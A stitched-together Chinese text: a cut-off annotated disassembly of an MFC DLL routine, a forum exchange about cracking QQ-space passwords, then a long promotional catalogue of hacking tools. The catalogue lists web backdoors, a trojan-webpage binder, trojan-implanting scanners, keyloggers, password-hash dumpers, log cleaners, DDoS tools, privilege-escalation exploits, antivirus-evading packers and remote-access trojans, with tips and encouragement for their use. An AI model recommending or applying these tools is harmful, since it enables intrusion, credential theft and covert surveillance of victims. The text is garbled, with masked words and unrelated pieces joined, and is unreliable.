1000B8C7 6A 04 push 4

1000B8C9 8945 DC mov dword ptr ss:[ebp-24],eax

1000B8CC 8D45 DC lea eax,dword ptr ss:[ebp-24]

1000B8CF 50 push eax

1000B8D0 8D4D C0 lea ecx,dword ptr ss:[ebp-40]

1000B8D3 E8 A4420000 call MFC42.CString::CString

1000B8D8 50 push eax

1000B8D9 8D4D EC lea ecx,dword ptr ss:[ebp-14]

1000B8DC C645 FC 03 mov byte ptr ss:[ebp-4],3

1000B8E0 E8 C3400000 call MFC42.CString::operator=

1000B8E5 C645 FC 01 mov byte ptr ss:[ebp-4],1

1000B8E9 8D4D C0 lea ecx,dword ptr ss:[ebp-40]

1000B8EC E8 AB400000 call MFC42.CString::~CString

1000B8F1 EB 50 jmp short BasicCtr.1000B943

1000B8F3 8B4D D8 mov ecx,dword ptr ss:[ebp-28] 当数据类型为9时，执行这个操作

1000B8F6 8D45 D0 lea eax,dword ptr ss:[ebp-30]

1000B8F9 50 push eax

1000B8FA E8 4E180000 call BasicCtr.1000D14D

1000B8FF 8B45 D0 mov eax,dword ptr ss:[ebp-30]

1000B902 FF75 EC push dword ptr ss:[ebp-14]

1000B905 8B08 mov ecx,dword ptr ds:[eax]

1000B907 53 push ebx

1000B908 50 push eax

1000B909 FF51 78 call dword ptr ds:[ecx+78]

1000B90C 8BD8 mov ebx,eax

1000B90E 85DB test ebx,ebx

1000B910 0F85 D4000000 jnz BasicCtr.1000B9EA

1000B916 8B45 D0 mov eax,dword ptr ss:[ebp-30]

1000B919 6A 04 push 4

1000B91B 8945 DC mov dword ptr ss:[ebp-24],eax

1000B91E 8D45 DC lea eax,dword ptr ss:[ebp-24]

1000B921 50 push eax

1000B922 8D4D BC lea ecx,dword ptr ss:[ebp-44]

1000B925 E8 52420000 call MFC42.CString::CString

1000B92A 50 push eax

1000B92B 8D4D EC lea ecx,dword ptr ss:[ebp-14]

1000B92E C645 FC 02 mov byte ptr ss:[ebp-4],2

1000B932 E8 71400000 call MFC42.CString::operator=

1000B937 C645 FC 01 mov byte ptr ss:[ebp-4],1

1000B93B 8D4D BC lea ecx,dword ptr ss:[ebp-44]

1000B93E EB AC jmp short BasicCtr.1000B8EC

1000B940 6A 01 push 1 当数据段的类型=7时，直接从此处执行

1000B942 5F pop edi

1000B943 8B5D D8 mov ebx,dword ptr ss:[ebp-28] 局部变量[ebp-28]保存全局的标志结构

1000B946 8D45 EC lea eax,dword ptr ss:[ebp-14] 局部变量[ebp-14]存放强制类型转换以后的数据指针的指针，例如DB2E0600

1000B949 50 push eax EAX存放强制类型转换以后的数据指针

1000B94A 8D45 E8 lea eax,dword ptr ss:[ebp-18] 局部变量[ebp-18]存放强制类型转换以后的数据指针的指针，例如AST

1000B94D FF75 E4 push dword ptr ss:[ebp-1C] 局部变量[ebp-1C]中的之一个字节保存本段的类型，4或者7

1000B950 8BCB mov ecx,ebx

1000B952 50 push eax

1000B953 E8 B4FCFFFF call BasicCtr.1000B60C call 1000B60C(CString,Flag,CString)

1000B958 85FF test edi,edi

1000B95A 74 18 je short BasicCtr.1000B974

1000B95C 8B45 E0 mov eax,dword ptr ss:[ebp-20] 局部变量[ebp-28]之一次为0，为一个计数器

1000B95F 8B4B 64 mov ecx,dword ptr ds:[ebx+64] 存在于标志结构中，为一个全局地址

1000B962 8B55 F0 mov edx,dword ptr ss:[ebp-10] 局部变量[ebp-10]保存拷贝后的数据，即没有经过处理的。例如040300BDAF……

1000B965 C1E0 02 shl eax,2 EAX=EAX*2

1000B968 891401 mov dword ptr ds:[ecx+eax],edx 将未做解调的原始数据放到全局结构中某个指针指示的内存中

1000B96B 8B4B 78 mov ecx,dword ptr ds:[ebx+78] 存在于标志结构中，为一个全局地址

1000B96E 8B55 CC mov edx,dword ptr ss:[ebp-34] 局部变量[ebp-34]保存本数据段的总长度

1000B971 891401 mov dword ptr ds:[ecx+eax],edx 将数据长度放到全局结构中某个指针指示的内存中

1000B974 8065 FC 00 and byte ptr ss:[ebp-4],0 局部布尔型变量[ebp-4]=0

1000B978 8D4D EC lea ecx,dword ptr ss:[ebp-14]

1000B97B E8 1C400000 call MFC42.CString::~CString 清除数据段中的数据部分CString

1000B980 834D FC FF or dword ptr ss:[ebp-4],FFFFFFFF 局部布尔型变量[ebp-4]=-1，为True

1000B984 8D4D E8 lea ecx,dword ptr ss:[ebp-18]

1000B987 E8 10400000 call MFC42.CString::~CString 清除数据段中的标志部分CString，例如AST

1000B98C FF45 E0 inc dword ptr ss:[ebp-20] 局部变量[ebp-28]计数器加一

1000B98F 8B45 E0 mov eax,dword ptr ss:[ebp-20]

1000B992 3B45 B8 cmp eax,dword ptr ss:[ebp-48] 局部变量[ebp-48]保存数据的段数

1000B995 0F8C DFFDFFFF jl BasicCtr.1000B77A 循环解调每个数据段

1000B99B 8B45 08 mov eax,dword ptr ss:[ebp+8] 最后剩余的长度

1000B99E F7D8 neg eax

1000B9A0 1BC0 *** b eax,eax

1000B9A2 83E0 04 and eax,4

1000B9A5 EB 1E jmp short BasicCtr.1000B9C5

1000B9A7 837D F0 00 cmp dword ptr ss:[ebp-10],0

1000B9AB 74 09 je short BasicCtr.1000B9B6

1000B9AD FF75 F0 push dword ptr ss:[ebp-10]

1000B9B0 E8 FF3F0000 call MFC42.operator delete

1000B9B5 59 pop ecx

1000B9B6 834D FC FF or dword ptr ss:[ebp-4],FFFFFFFF

1000B9BA 8D4D E8 lea ecx,dword ptr ss:[ebp-18]

1000B9BD E8 DA3F0000 call MFC42.CString::~CString

1000B9C2 6A 04 push 4

1000B9C4 58 pop eax

1000B9C5 8B4D F4 mov ecx,dword ptr ss:[ebp-C]

1000B9C8 5F pop edi

1000B9C9 5E pop esi

1000B9CA 5B pop ebx

1000B9CB 64:890D 000000 mov dword ptr fs:[0],ecx

1000B9D2 C9 leave

1000B9D3 C2 0400 retn 4

1000B9D6 837D F0 00 cmp dword ptr ss:[ebp-10],0

1000B9DA 74 09 je short BasicCtr.1000B9E5

1000B9DC FF75 F0 push dword ptr ss:[ebp-10]

1000B9DF E8 D03F0000 call MFC42.operator delete

1000B9E4 59 pop ecx

1000B9E5 8B45 D4 mov eax,dword ptr ss:[ebp-2C]

1000B9E8 EB 12 jmp short BasicCtr.1000B9FC

1000B9EA 837D F0 00 cmp dword ptr ss:[ebp-10],0

1000B9EE 74 09 je short BasicCtr.1000B9F9

1000B9F0 FF75 F0 push dword ptr ss:[ebp-10]

1000B9F3 E8 BC3F0000 call MFC42.operator delete

1000B9F8 59 pop ecx

1000B9F9 8B45 D0 mov eax,dword ptr ss:[ebp-30]

1000B9FC 8B08 mov ecx,dword ptr ds:[eax]

1000B9FE 50 push eax

1000B9FF FF51 08 call dword ptr ds:[ecx+8]

1000BA02 8BF3 mov esi,ebx

1000BA04 EB 03 jmp short BasicCtr.1000BA09

1000BA06 6A 04 push 4

1000BA08 5E pop esi

1000BA09 8065 FC 00 and byte ptr ss:[ebp-4],0

1000BA0D 8D4D EC lea ecx,dword ptr ss:[ebp-14]

1000

求用源代码方式破解设置权限的空间

我也试了三年了 。。。现在也没找到，所以我特意给他的网站评价垃圾

谁知道进 *** 空间的密码怎么解开啊？急急急

腾讯的技术力量是不可小瞧的，所以无法破解任意空间的密码和相册密码，除非你直接问主人。

暴力破解在原理上是可行的，但是需要时间太长，每秒15个密码的的速度要破解8位纯数字密码需要连续工作100多天，而密码还可以是数字字母组合或者汉字，所以即使有破解软件，破解是不现实的。况且腾讯会把短时间连续登录视为非法行为而封掉IP。

真正的黑客还是可以通过端口入侵给对方电脑安装木马，记录键盘操作来达到破解 *** 密码的目的。可是真正的黑客是不屑于破解这种小玩意的。而且，对于安全意识很高，杀软配置得当的用户黑客也会无能为力。

不要企图通过不正当手段获取对方隐私资料。况且，一个 *** 空间或者相册什么问题也说明不了。

很开心的生活吧，不要因为一些无所谓的事而大伤脑筋。

怎么诶有可用的 *** 破码器啊？

CGI后门：

cgi网页后门 cgi网页后门，envymask编写...《

网页合并器 本程序可以自动生成网页，可以把网页和EXE合成新的网页，在打开网页的同时自动运行EXE文件.你将木马合并在一个网页中，别人浏览之后，呵呵，我什么都没说~~~

海阳顶端网木马 windows环境下永远不会被查杀的木马，因为它是用asp做的，也是一套asp在线极好的网页编辑软件，支持在线更改、编辑、删除任意文本文件，同时最重要的是解决了无组件asp上传...（中文版

cgi-backdoor 几个cgi木马(十多种利用最新漏洞的web脚本后门，涵盖jsp,php,asp,cgi等等) *

命令行后门类

winshell

WinShell是一个运行在Windows平台上的Telnet服务器软件，主程序是一个仅仅5k左右的可执行文件，可完全独立执行而不依赖于任何系统动态连接库，尽管它体积小小，却功能不凡，支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等...《入侵NT中winshell的使用》

Gina

Gina木马的主要作用是在系统用户登陆时，将用户登陆的名字，登陆密码等记录到文件中去，因为这个DLL是在登陆时加载，所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户...儒

Wollf1.5 我们的一位女黑客写的软件，扩展Telnet服务，集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能，可反向连接，可通过参数选择随系统启动或作为普通进程启动

WinEggDrop Shell 1.50最终版在 一个扩展型的telnet后门程序{中国最强的后门}

**********************************************************************************************

菜鸟扫描软件！

20CN IPC 扫描器正式版

全自动IPC扫描器，可以同步植入木马，可以透过部分没有配置完整的防火墙，能够探测流光探测不到的一些用户...（中文版）

*** 肉鸡猎手

一个快速查找 *** 肉鸡的小工具

网页信息神探 使得网页不再有秘密，各种信息一目了然，什么电影、图片、Email地址、文章、Flash、压缩文件、可执行文件...等等的链接地址无处可藏！连续而快速下载各种软件、打包教程、VB、VC、动画教程、Flash、电影、 *** 图片

**************************************************************************************

SQL2.exe SQL蠕重听过吧，就是的这个漏洞！

NetScanTools 一款功能强大的 *** 工具包...（英文版）

dvbbs.exe

动网logout.asp利用程序

THCsql

针对David Litchfield发现的MSSQL OpenDataSource函数漏洞的攻击程序，内含源代码。

小紫V2.0追加版

*小紫*（LB论坛噩梦）V2.0追加版加入LB.EXE，可以获得论坛管理员权限。

LB5论坛轰炸机

我兄弟写的程序，{推存}

LB5论坛轰炸机修正版2.5在LB5论坛轰炸机修正版2.0的原有功能基础上增加以下功能及特性：1同时支持6线程轰炸，速度可比V2.0提高一倍以上 2机器智能重新增加,带有自动转向定位功能 3增加监视窗口 4标题可改...（

MSN 消息攻击机

这是一个用于MSN Messenger 的消息攻击机（其实不局限于MSN 的），它具有超快的攻击速度，据测试，在普通Pentium 200 MMX 攻击速度可以达到5条/秒。而且软件体积极小，有效节省系统资源...（

怪狗专用版3389登陆器 我改的一个小程序，有用户名密码，用它可以3389登陆win系统，（必备）

DameWare NT Utilities

一款功能强大的Windows NT/2000/XP 服务器远程控制软件，只要拥有一个远程主机的管理帐号，就能使用它远程GUI下登陆交互控制主机...（英文版）《

追捕： 找到IP所在地！

柳叶擦眼

这个小软件可以列出系统所有的进程（包括隐藏的），并可以杀死进程.这个是共享软件...（中文版）《让传奇木马走开》

Xdebug ey4s大哥写的windows 2000 kernel exploit，有了它提升权限就简单了！

*** 之狐 可得到最新 *** ，用于隐藏真实IP，不过，有能力更好自己在肉机上做个 *** 安全！

HackerDicBuilder 本软件属于一款字典 *** 工具，根据国人设置密码的习惯,利用线程技术，生成字典文件 ... （中文版） 多位朋友点播

scanipc 这个是木头见过的最傻瓜化的入侵软件了，只要设置好你要上传的后门和IP范围，它就会开始工作了，界面简单实用，全自动IPC扫描器，可以同步植入木马，可以透过部分没有配置完整的防火墙，能够探测流光探测不到的一些用户 ...

Tiny Honeypot 这是一款简单的蜜罐程序，主要基于iptables的重定向和一个xinetd监听程序，它监听当前没有使用的每个TCP端口记录所有的活动信息，并且提供一些回送信息给入侵者。应答部分全部采用perl程序编写，它提供了足够的交互信息足以愚弄大多数的自动攻击工具和小部分的入侵者。通过缺省的适当限制，该程序可以安装在产品主机上，而几乎不会影响主机的性能（应用平台Linux/POSIX）

Clearlog 用于删除Windows NT/2K/XP的WWW和FTP安全日志文件，通常入侵某台服务器后为了避免被跟踪，都采用这一 *** 来消除IP记录 ... 《入侵全攻略》

LC4 可以检测用户是否使用了不安全的密码，是更好，最快的Win NT/2000 workstations 密码破解工具，目前这是最新版本.它宣称：在P300机器上不到48小时可以破解90%的超级用户(Admin)口令.18%不到10分钟就可以破解出来 ...

独裁者 DDOS 工具， 此软件太厉害，千万不可烂用，否则可能进监狱！

LocatorHack.exe MS Locator!formQueryPacket.wcscpy 远程溢出工具与webdav漏洞一样厉害。Microsoft Windows Locator服务远程缓冲区溢出漏洞

TFTPD32.exe 图形化的TPTP工具，做黑客这样的工具都没有，说不过去！

iis5sp3 说明中说，iis5安装sp3的溢出成功，反正我在sp3下没成功过！

*** brelay.exe 可利用网页得到NT密码散列！{推存}

IECookiesView1.5 可改写cookies信息，有此工具进行cookies欺骗就简单多了，

HackPass.exe，MD5.exe 破解MD5密码的软件~！

DVGetPass.exe 动网tongji.asp漏洞利用工具，可得到论坛管理员权限，再上传ASP木马！呵呵就~~~~

webadv 针对iis+sp3的溢出成功率很高(溢出后system权限!) *

R_ webadv 能用版的webdav漏洞使用工具！听说，日本，繁体都能用，

ipscan 大范围网段快速ipc$猜解

svc 远程安装/删除win2k服务

3389.vbs 远程安装win2k终端服务不需i386

arpsniffer arp环境sniffer(需要winpcap2.1以上) *

ascii 查询字符和数字ascii码(常用来对url编码用以躲避ids或脚本过滤)

ca 远程克隆账号

cca 检查是否有克隆账号

crackvnc 远程/本地破解winvnc密码(本地破用-W参数)

pass.dic 密码字典

debploit win2k+sp2配置更佳权限提升工具

fpipe 端口重定向工具

fscan superscan命令行版本(可定义扫描时的源端口并支持udp端口扫描) *

hgod04 ddos攻击器

idahack ida溢出

idq.dll 利用isapi漏洞提升权限(对sp0+sp1+sp2都非常有效，也是很棒的web后门)

IIS idq溢出

inst.zip 指定程序安装为win2k服务 *

ip_mail.rar 发送主机动态IP的软件 *

ipc.vbs 不依赖ipc$给远程主机开telnet

ispc.exe idq.dll连接客户端

Keyghost.zip 正版键盘记录器

log.vbs 日志清除器(远程清除不依赖ipc$)

msadc.pl winnt的msadc漏洞溢出器 *

MsSqlHack mssql溢出程序1

mysql-client mysql客户端

Name.dic 最常用的中国人用户名(看看你常用的用户名在不在里面)

PassSniffer 大小仅3kb的非交换机sniffer软件 *

psexec 通过ipc管道直接登录主机

pskill 杀进程高手

pslist 列进程高手

rar 命令行下的中文版winrar(功能相当全面) *

reboot.vbs 远程重启主机的脚本

sdemo.zip 巨好的屏幕拍摄的录像软件

shed 远程查找win9x的共享资源

sid 用sid列用户名

SkServerGUI snake多重 *** 软件

SkSockServer snake *** 程序

*** BCrack 是小榕为流光5开发的测试原型，和以往的 *** B（共享）暴力破解工具不同，没有采用系统的API，而是使用了 *** B的协议。Windows 2000可以在同一个会话内进行多次密码试探 ... 《入侵全攻略》

socks 利用这工具安装木马，即使网关重新低格硬盘木马也在嘿嘿 *

SocksCap 把socks5 *** 转化为万能 ***

SPC.zip 可以直接显示出远程win98共享资源密码的东东 *

WMIhack 基于WMI服务进行账号密码的东东(不需要ipc)

skmontor snake的注册表监视器（特酷的)

sql1.exe mssql溢出程序2

sql2.exe mssql溢出程序3

SqlExec mssql客户端

SuperScan GUI界面的优秀扫描器

syn syn攻击之一高手

upx120 特好的压缩软件，常用来压缩木马躲避杀毒软件

wget 命令行下的http下载软件

Win2kPass2 win2k的密码大盗

Winnuke 攻击rpc服务的软件(win2ksp0/1/2/3+winnt+winxp系统不稳定)

*** bnuke 攻击netbios的软件(win2ksp0/1/2/3+winnt+winxp系统死机)

WinPcap_2_3 nmap,arpsniffer等等都要用这个

WinPcap_2_3_nogui.exe 无安装界面自动安装的WinPcap_2_3（命令行版) *

scanbaby2.0 能对80%的mail服务利用漏洞列账号密码破解(超酷哦，去看rfc里有mail弱点说明) *

SuperDic_V31 非常全面的黑客字典生成器

Getadmin win2k+sp3配置的权限提升程序(不错!!!) *

whoami 了理自己的权限

FsSniffer 巨好的非交换机sniffer工具

twwwscan 命令行下巨好的cgi扫描器

TFTPD32 给远方开tftp服务的主机传文件(当然要有个shell)

RangeScan 自定义cgi漏洞的GUI扫描器

pwdump2 本地抓winnt/2k密码散列值(不可缺)

pwdump3 远程抓winnt/2k密码散列值(不可缺)

procexpnt 查看系统进程与端口关联(GUI界面) *

nc 已经不是简单的telnet客户端了

CMD.txt 有什么cmd命令不懂就查查它 *

fport 命令行下查看系统进程与端口关联(没有GUI界面的procexpnt强)

BrutusA2 全功能的密码破解软件,支持telnet,ftp,http等服务的口令破解

cmd.reg 文件名自动补全的reg文件(命令行:按TAB键自动把sys补全为system,再按一次就变为system32)

regshell 命令行下的注册表编辑器

nscopy 备份员工具(当你是Backup Operators组的用户时有时你的权限会比admin还大)

session.rar 有了win/nt2000目标主机的密码散列值,就可以直接发送散列值给主机而登录主机 *

klogger.exe 一个几kb的击键记录工具,运行后会在当前目录生成KLOGGER.TXT文件 *

*** b2 发动 *** b的中间人MITM攻击的工具，在session中插入自己的执行命令 *

xptsc.rar winxp的远程终端客户端(支持win2000/xp)

SQLhack.zip 相当快的mssql密码暴力破解器

mssql 相当快的mssql密码暴力破解器

ntcrack.zip 利用获取到的MD4 passwd hash破解帐号密码

SQLSniffer.rar MSsql的密码明文嗅探器

TelnetHack.rar 在拥有管理员权限的条件下，远程打开WIN2000机器的Telnet服务

RFPortXP.exe XP下关联端口与进程的程序

SQLTools.rar mssql工具包

ServiceApp.exe 远程安装/删除服务

hgod 具有SYN/DrDos/UDP/ICMP/IGMP拒绝服务测试功能的选项

hscan 小型综合扫描器(支持cisco,mysql,mssql,cgi,rpc,ipc(sid),ftp,ssh, *** tp等等相当全面)

HDoor.rar ping后门(icmp后门)

SIDUserEnum.exe 利用sid得到用户列表(小榕的那个sid有时不能完全列举出来) *

RPC_LE.exe 利用rpc溢出使win2k重启(对sp3+sp4hotfix有效) *

r3389.exe 查询Terminal Server更改后的端口（1秒内） *

*** bsniffer.exe 获取访问本地主机网页的主机散列值(支持截获内网主机散列) *

NetEnum.exe 通过3389端口+空连接获取对方主机大量信息 *

aspcode.exe 经测试最有效的asp溢出程序第二版(对sp2有效)

sslproxy 针对使用ssl加密协议的 *** （扫描器通过它就可以扫描ssl主机了!!!!) *

lsa2 在lsa注册表键里获取winnt/2k的明文密码包括sqlserver的(打了补丁就没用了) *

psu.exe 用指定进程的权限打开指定的程序

ldap.msi ldap 轻量级目录服务客户端,通过389端口获取主机大量信息如账号列表 *

rootkit 从系统底层完美隐藏指定进程，服务，注册表键并可以端口绑定的内核级win2k后门!!! *

Xscan 一款强大的扫描软件，可以和流光相媲美 采用多线程方式对指定IP地址段（或单机）进行安全漏洞检测，支持插件功能，提供了图形界面和命令行两种操作方式，扫描内容包括：远程操作系统类型及版本，标准端口状态及端口BANNER信息，SNMP信息，CGI漏洞，IIS漏洞，RPC漏洞，SQL-SERVER、FTP-SERVER、 *** TP-SERVER、POP3-SERVER、NT-SERVER弱口令用户，NT服务器NETBIOS信息、注册表信息等。扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。 增SSL插件，用于检测SSL漏洞；升级PORT、HTTP、IIS插件...（

x-way2.5 采用多线程形式对服务器系统进行漏洞扫描和安全测试工具，X-WAY多个版本均在Win2000下开发，建议用户使用时候也在Win2000环境，以发挥更佳效果...（中文版）《扫描工具，别忘了x-way2.5》

SSS 俄罗斯出的，更好的扫描软件，还有分析，有漏洞描述，速度慢了点，它是我见地的更好的扫描软件！

NAMP 我一直用的是个这命令行的扫描软件，有win，LINUX版的，又快，又好，支持TCP,UDP,ICMP,安全扫描不会留下扫描日志！

下面的软件本来不想收进来给大家看，因为顶级黑客不入侵个人电脑，基本不用别人写的木马，肯定是人手一个（自己编写的木马）

没有任何杀毒软件能查出来的。

**********************************************************************************************

使用木马改造工具：

ASPack 这个是使用木马都一定要会用的工具，它能压缩木马，不让杀毒软件查出来！

UPX 非常好的可执行文件压缩软件，支持的格式包括 atari/tos，djgpp2/coff，dos/com，dos/exe，dos/sys，rtm32/pe，tmt/adam，watcom/le，win32/pe，Linux/i386 等等，压缩比率也非常的高 ...

**************************************************************************************

菜鸟级木马类：

黑境

近墨者

魔法控制

灰鸽子

风雪 国产后门风雪，此版根据一些网友的建议，改进了几个功能，一个是可以配置是否自动共享C盘的功能，另一个是在查看菜单上加上了密码是否用*号来表示，同时修正了1.3版本在打开网址时按取消键仍会打开网址的BUG...（

*** 神偷 一款远程控制软件，更新速度较快，可以访问局域网中的计算机，连接稳定上传 *** 快，但是会被很多杀毒厂商看成木马病毒追杀，要求使用者有自己的FTP空间 ... （中文版

冰河 3

广外男生

广外女生

Peep

一套运用反端口技术的远程监控软体，运用此原理可以达到一般远程控制软体所无法达到之功能，例如可对区域网路及有架设防火墙的电脑作监控，被控端电脑将具有自动回传连线之功能，通讯埠可任意动态修改，及具有独立连线，也就是说除您本人其他人无法连线监控。其他的功能还有上线通知、连线速率调整、远端档案总管、远端桌面监控、

远端进程管理、远端登录编辑、网页通报服务、DDoS攻击、还有被控端程式设置精灵、有常驻选择、文件捆绑及连线方式等选项...（中文版）

木牛隐型版 运行后，服务器上硬盘C盘符共享（完全控制权限）开启ADMIN$、IPC$共享，开启TELNET服务，自动创建一个管理员权限帐号：IUSR_COMPUTER 密码：IUSR_COMPUTER...该版本自动修改注册表，重起后自动运行

IE'en 通过IE远程控制的软件。它可以远程遥控IE动作，可以直接截取IE和任何服务器之间的数据通讯，你在IE中输入的用户名、密码等机密信息都在此列，它可以以纯文本方式存储或发送这些信息，一旦启动这一软件，远端被监控的浏览器窗口中进行的任何输入输出都会显示在本地IE'en中。运行ieen_s.exe（注：服务端）需要管理员权限

盗密高手 监视被监视端（装了此程序的电脑）上 *** 、邮箱等各种密码，并发送到您设置的邮箱